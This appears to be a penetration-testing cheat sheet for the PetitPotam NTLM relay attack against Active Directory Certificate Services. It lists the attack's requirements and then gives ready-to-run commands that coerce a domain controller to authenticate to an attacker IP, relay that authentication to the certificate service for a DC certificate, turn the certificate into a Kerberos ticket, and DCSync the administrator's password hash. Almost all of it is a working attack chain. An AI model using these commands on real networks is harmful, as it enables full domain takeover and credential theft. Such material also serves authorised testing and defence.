Tags
Attack requirements
Feature / Component | Required for PetitPotam | Required for Full Relay to DA via AD CS |
EFSRPC | ✅ Yes | ✅ Yes |
NTLM Enabled | ✅ Yes | ✅ Yes |
SMB/LDAP Signing Disabled | ✅ Yes (on relay target) | ✅ Yes (on certsrv or LDAP) |
AD CS Installed | ❌ No | ✅ Yes |
Vulnerable AD CS Template | ❌ No | ✅ Yes |
EPA / Channel Binding Off | ❌ No | ✅ Yes |
Identify
Exploit
Start ntlmrelayx
sudo ntlmrelayx.py -debug -smb2support --target http://CA01.domain.local/certsrv/certfnsh.asp --adcs --template DomainControllerAt the same time try to coerce DC to auth
python3 PetitPotam.py <attackerIP> <DCIP>You should receive a base64 encoded certificate in ntlmrelayx output
Next, we can take this base64 certificate and use gettgtpkinit.py to request a Ticket-Granting-Ticket (TGT) for the domain controller.
python3 /opt/PKINITtools/gettgtpkinit.py DOMAIN.LOCAL/DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSI...SNIP...CKBdGmY= dc01.ccacheSet krb env variable
export KRB5CCNAME=dc01.ccacheAttempt DCSync
impacket-secretsdump -just-dc-user DOMAIN/administrator -k -no-pass "DC01$"@DC01.DOMAIN.LOCAL